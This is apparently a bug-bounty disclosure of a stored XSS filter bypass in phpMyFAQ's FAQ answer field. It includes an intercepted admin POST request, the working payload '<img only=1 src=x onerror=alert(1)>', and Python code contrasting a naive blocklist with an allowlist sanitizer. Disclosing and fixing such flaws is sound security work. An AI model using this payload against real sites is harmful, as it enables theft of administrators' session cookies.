Stored XSS bypass in "FAQ" in thorsten/phpmyfaq
Reported on
May 2nd 2023
Description
Stored XSS in the "Add new FAQ" feature: an XSS payload injected into the "Answer" field of https://roy.demo.phpmyfaq.de/admin/?action=editentry is stored and executes when the FAQ entry is viewed.
Steps
1- Log in as admin and go to https://roy.demo.phpmyfaq.de/admin/?action=editentry to add a new FAQ.
2- Enter the "Question" and "Answer" values, submit, and intercept the request:
POST /admin/?action=insertentry HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=0d93a6d553659b592de5960477f2dcf3; phpmyfaq-setup=db7f78de80ee8152a536f2e90b38c1ff; cookieconsent_status=dismiss; pmf_sid=53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 535
Origin: https://roy.demo.phpmyfaq.de
Referer: https://roy.demo.phpmyfaq.de/admin/?action=editentry
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
revision_id=0&record_id=0&csrf=bc90de34174f4df1482c5213efba2f94863687d1&openQuestionId=0&notifyUser=&notifyEmail=&question=&answer=<!DOCTYPE+html>
<html>
<head>
</head>
<body>
<p>ssssssssssssssssssssssssssssssssssssssssssss</p>
</body>
</html>&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=Admin&email=demoadmin%40phpmyfaq.de&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=no&solution_id=1000
3- Delete the HTML in the "answer" parameter and replace it with a bypass payload such as <img only=1 src=x onerror=alert(1)>
4- Send the request and publish the entry; the alert fires when the FAQ is viewed.
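The payload in step 3 differs from a plain <img src=x onerror=alert(1)> only by the extra only=1 attribute, which is what makes it a "bypass": a filter that pattern-matches the expected shape of a malicious tag does not recognise the tag once an unexpected attribute is inserted before src. The following is an added example and is not phpMyFAQ's code. naive_blocklist_filter is a hypothetical stand-in for that class of filter (the project's real filter is not shown in this report), and allowlist_sanitize shows the fix: re-serialise the answer keeping only allowlisted tags and, per tag, allowlisted attributes, so on* handlers and unknown attributes are dropped wherever they appear in the tag. The inputs are the benign answer and the payload from the steps above.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed inputs taken from the report: the benign answer from step 2
# and the bypass payload from step 3.
BENIGN_ANSWER = "<p>ssssssssssssssssssssssssssssssssssssssssssss</p>"
BYPASS_PAYLOAD = "<img only=1 src=x onerror=alert(1)>"

# Hypothetical blocklist filter. It is NOT phpMyFAQ's code; it stands in for
# the class of pattern-matching filters that an extra attribute slips past:
# it only recognises <img src=... on...=...> with src as the first attribute.
_IMG_WITH_HANDLER = re.compile(r"<img\s+src=\S+\s+on\w+=[^>]*>", re.IGNORECASE)


def naive_blocklist_filter(html: str) -> str:
    """Strip <img src=x onerror=...> but nothing that deviates from that shape."""
    return _IMG_WITH_HANDLER.sub("", html)


# Allowlist sanitizer: keep only known tags and, per tag, known attributes.
# Event handlers (on*) and unknown attributes such as only=1 are never listed,
# so they are dropped regardless of their position in the tag.
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "strong": set(), "em": set(),
    "ul": set(), "ol": set(), "li": set(),
    "a": {"href"}, "img": {"src", "alt"},
}
VOID_TAGS = {"br", "img"}
# Accept http(s) and relative URLs; reject javascript:, data:, vbscript:, etc.
_SAFE_URL = re.compile(r"^(https?:|/|[^:]*$)", re.IGNORECASE)


class _Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag (script, iframe, ...) dropped; its text is kept escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue  # drops onerror=, only=1, style=, ...
            value = (value or "").strip()
            if name in ("href", "src") and not _SAFE_URL.match(value):
                continue  # drops javascript: and other dangerous schemes
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def allowlist_sanitize(html: str) -> str:
    """Re-serialise the answer keeping only allowlisted tags and attributes."""
    parser = _Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    for name, html in (("benign", BENIGN_ANSWER), ("bypass", BYPASS_PAYLOAD)):
        print(f"{name:7} blocklist : {naive_blocklist_filter(html)}")
        print(f"{name:7} allowlist : {allowlist_sanitize(html)}")
```

Running it shows the blocklist stripping the plain <img src=x onerror=...> form while passing the only=1 variant through untouched, whereas the allowlist reduces the payload to <img src="x"> and leaves the benign <p> answer unchanged. The design point is that the allowlist never reasons about what is dangerous; it only emits what is explicitly permitted, so attribute ordering, extra attributes and case tricks have nothing to bypass.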
Impact
Any co-admin or support user with rights to add FAQ entries can inject the payload and steal the cookies of an admin who views the entry.